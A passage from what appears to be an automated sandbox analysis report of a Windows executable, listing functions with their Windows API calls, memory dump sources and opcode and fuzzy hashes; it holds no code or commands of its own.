                                                                                                            • Opcode Fuzzy Hash: e6b243bbc59c12d291bb2c26f29d1fe53fabb9556934d383d9015f697d95f68f
                                                                                                            • Instruction Fuzzy Hash: E4B14D311082029FCB14EF24C491DAAB7E5EF94315F58895DFC9697262EB30ED49CBB2
                                                                                                            Function 00DC2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __fread_nolock
                                                                                                            • String ID: EA06
                                                                                                            • API String ID: 2638373210-3962188686
                                                                                                            • Opcode ID: 4eecfad19ad3b848eccc18ec3a737bc25e6866e3eb7a22fcfa2fb402868e7272
                                                                                                            • Instruction ID: ba9e34c3c30d4497f3d42e1a1d30f0ffda2e0a3c3cdfa78a94ebc88ac8e82a2e
                                                                                                            • Opcode Fuzzy Hash: 4eecfad19ad3b848eccc18ec3a737bc25e6866e3eb7a22fcfa2fb402868e7272
                                                                                                            • Instruction Fuzzy Hash: 750192729442586EDB18C7A88856EAEBBF8DB05305F04859EE196D2181E5B4E6088B70
                                                                                                            Function 00D53837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D53908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144537725-0
                                                                                                            • Opcode ID: 033b4ed371677a2de72195c0837a88de16786aef1224d9f3060bce4424bc762b
                                                                                                            • Instruction ID: 664621616f68acf8f17e935f85b9e93a9badbe9c7dac3d90804eb6dcf744a287
                                                                                                            • Opcode Fuzzy Hash: 033b4ed371677a2de72195c0837a88de16786aef1224d9f3060bce4424bc762b
                                                                                                            • Instruction Fuzzy Hash: BD31C1B06043008FDB21DF65D884797BBE8FB59349F04096EFD9A97240E771AA48CB62
                                                                                                            Function 015D6DA0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 015D6610: GetFileAttributesW.KERNELBASE(?), ref: 015D661B
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 015D6ED8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3401506121-0
                                                                                                            • Opcode ID: 25a665a401adf69462e8694e49104ee4a4af0262a16e34221b4f10e6e7f4d893
                                                                                                            • Instruction ID: 438cac08a82c4c008c31d2fc5f00647df39c94e2507656e96a52f2ad42182a62
                                                                                                            • Opcode Fuzzy Hash: 25a665a401adf69462e8694e49104ee4a4af0262a16e34221b4f10e6e7f4d893
                                                                                                            • Instruction Fuzzy Hash: 5551833191020996EF24EFA4C854BEF733AFF58700F004668F609EB290EB799B45CB65
                                                                                                            Function 00D6FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                            • Instruction ID: a9a38d426ef04697e135e2500f5b21108c20a368af460b60d3a12ce8a6179035
                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                            • Instruction Fuzzy Hash: 4731F275A00509DBC718CF59E4C0969FBA2FF49300B2986A5E809CB656D731EDC1CBE0
                                                                                                            Function 00D54ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D54E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
                                                                                                              • Part of subcall function 00D54E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
                                                                                                              • Part of subcall function 00D54E90: FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EFD
                                                                                                              • Part of subcall function 00D54E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E62
                                                                                                              • Part of subcall function 00D54E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D54E74
                                                                                                              • Part of subcall function 00D54E59: FreeLibrary.KERNEL32(00000000,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2632591731-0
                                                                                                            • Opcode ID: dbdd651b71f823469cab0f352a483d27f021380856c1cab856f2381d68708c5d
                                                                                                            • Instruction ID: 00ecd3f08845d7e419f85afaec90f678cd1afaa4ced6883f7e69387e4ac65647
                                                                                                            • Opcode Fuzzy Hash: dbdd651b71f823469cab0f352a483d27f021380856c1cab856f2381d68708c5d
                                                                                                            • Instruction Fuzzy Hash: A9110132610305ABCF20BB68DC12FAD77A4EF40716F10842DFD42AA1C1EE709A899B71
                                                                                                            Function 00D88402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __wsopen_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 3347428461-0
                                                                                                            • Opcode ID: bf786b62cae88eafb9a49b9845fdb3cc65200ed53b5adf579086dc554a715d9e
                                                                                                            • Instruction ID: 69abb877580854b17a5a6d80f3db412d9bf08a541f6b198af3e376b60c292b2f
                                                                                                            • Opcode Fuzzy Hash: bf786b62cae88eafb9a49b9845fdb3cc65200ed53b5adf579086dc554a715d9e
                                                                                                            • Instruction Fuzzy Hash: C311487290420AAFCF15DF58E94099A7BF9EF48300F144059FC08AB312DB30DA11DBA4
                                                                                                            Function 00D85000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D84C7D: RtlAllocateHeap.NTDLL(00000008,00D51129,00000000,?,00D82E29,00000001,00000364,?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?), ref: 00D84CBE
                                                                                                            • _free.LIBCMT ref: 00D8506C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                            • Instruction ID: fb42c13ab20ef36b42695174b6d28e910e7868611618cd7a9c9d95fb28adc347
                                                                                                            • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                            • Instruction Fuzzy Hash: 96016D722047056BE331DF69E881A9AFBECFB89370F29051DE184832C0EB30A805C7B4
                                                                                                            Function 00D7E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                            • Instruction ID: d45bcf2a29ab32ce3b73ad6ed3da7c20221066eb6985e67b197c8c477e86b5bf
                                                                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                            • Instruction Fuzzy Hash: B7F02832511A10A6C7313B698C06B5E339DDF56330F148B55F829931D2FB74D8028BB5
                                                                                                            Function 00D84C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00D51129,00000000,?,00D82E29,00000001,00000364,?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?), ref: 00D84CBE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 93a5b6fddd738c607a743bd6b363147c7b36d1f813790d7a1415fa1eee8c9fd0
                                                                                                            • Instruction ID: 6c86ef5b894438337f6b5cc8b494d7a48b907f3cd0fcaaf7b7617814bf913413
                                                                                                            • Opcode Fuzzy Hash: 93a5b6fddd738c607a743bd6b363147c7b36d1f813790d7a1415fa1eee8c9fd0
                                                                                                            • Instruction Fuzzy Hash: ACF0BE3160332677DB217F629D09B6A778CAF917A0B198125B819EA281DF70D80187B0
                                                                                                            Function 00D83820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: e0bd3288fa86173ef950f4c9ba164bf532c7d38d7a5429e05e17f1fa26decefd
                                                                                                            • Instruction ID: bf116a9ed57d66ae5681708e982176cd9f1c9e4b66e57c7404e1529022ef22b8
                                                                                                            • Opcode Fuzzy Hash: e0bd3288fa86173ef950f4c9ba164bf532c7d38d7a5429e05e17f1fa26decefd
                                                                                                            • Instruction Fuzzy Hash: BBE065312023245BD63137679C05F9A7669EF42FB0F194125BC5DA6591EB61DE0183F1
                                                                                                            Function 00D54F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54F6D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 9b56550389cd906e718647d055f511e5e76f9ebdebcbecc5729402b2f4ef9214
                                                                                                            • Instruction ID: 91ad6a5c7c62af4d1b8590a5e35989a5d6a63aa76c9d2a4493fa2a0075a393b8
                                                                                                            • Opcode Fuzzy Hash: 9b56550389cd906e718647d055f511e5e76f9ebdebcbecc5729402b2f4ef9214
                                                                                                            • Instruction Fuzzy Hash: A6F01571109752CFDB349F68D490866BBE4AF1432A324896EE9EA86621C7319888DF21
                                                                                                            Function 00D52DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D52DC4
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 541455249-0
                                                                                                            • Opcode ID: d9003afb05728363fb71779ef0ee2f9bcad7208f54534121467eed94d78b08f5
                                                                                                            • Instruction ID: a42db05dd4348028a679a116ec62e860bf82f766edb5160c0be475366da49145
                                                                                                            • Opcode Fuzzy Hash: d9003afb05728363fb71779ef0ee2f9bcad7208f54534121467eed94d78b08f5
                                                                                                            • Instruction Fuzzy Hash: CAE0CD776042245BCB10A6989C06FEA77DDDFC8790F040071FD09D7248E970ED848570
                                                                                                            Function 00DC2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __fread_nolock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2638373210-0
                                                                                                            • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                            • Instruction ID: 10f17312863b497f78d992f3b99ca17c2c4bb6461cecf8880d658908a2a4b4f0
                                                                                                            • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                            • Instruction Fuzzy Hash: 21E048B06097005FDF395A28A851BB677D5DF49300F14045EF59F83252E5726845866D
                                                                                                            Function 00D52B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D53908
                                                                                                              • Part of subcall function 00D5D730: GetInputState.USER32 ref: 00D5D807
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D52B6B
                                                                                                              • Part of subcall function 00D530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D5314E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                            • String ID:
                                                                                                            • API String ID: 3667716007-0
                                                                                                            • Opcode ID: 5972d4b411afd2bc5af6d29be1a2f5734e4f1ae0f7650532fc8265f9342439f2
                                                                                                            • Instruction ID: 49f7eb3e616986a5cb6bcf2df075427b4245747b2adb26cba59610c7da6ba3d4
                                                                                                            • Opcode Fuzzy Hash: 5972d4b411afd2bc5af6d29be1a2f5734e4f1ae0f7650532fc8265f9342439f2
                                                                                                            • Instruction Fuzzy Hash: 4FE0262230034406CE08BB34A8524BDBB59CBE1393F40143EFC56832A3CE204A4E8231
                                                                                                            Function 015D6610 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 015D661B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                            • Instruction ID: 9846707a577547420ff4344f5a456e0bfd842a486909b09b3cbfba68a79da4f8
                                                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                            • Instruction Fuzzy Hash: BDE08C70A05208EBDB30DAAC8904AAD77A8E708320F044A55F906CB2C0D6318A42D714
                                                                                                            Function 00D9039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00D90704,?,?,00000000,?,00D90704,00000000,0000000C), ref: 00D903B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 26122b664a7e1301ecfd0b1f815a34204bbf59df4bb136a4a4da3a14e7d56e1c
                                                                                                            • Instruction ID: a326c52ad3ced0588518ae536cb9f675c26f39591cc826e2e82d15604e9b9f23
                                                                                                            • Opcode Fuzzy Hash: 26122b664a7e1301ecfd0b1f815a34204bbf59df4bb136a4a4da3a14e7d56e1c
                                                                                                            • Instruction Fuzzy Hash: 3FD06C3205024DBBDF029F84DD46EDA3FAAFB48714F014000BE1896120C732E822AB91
                                                                                                            Function 015D65E0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 015D65EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
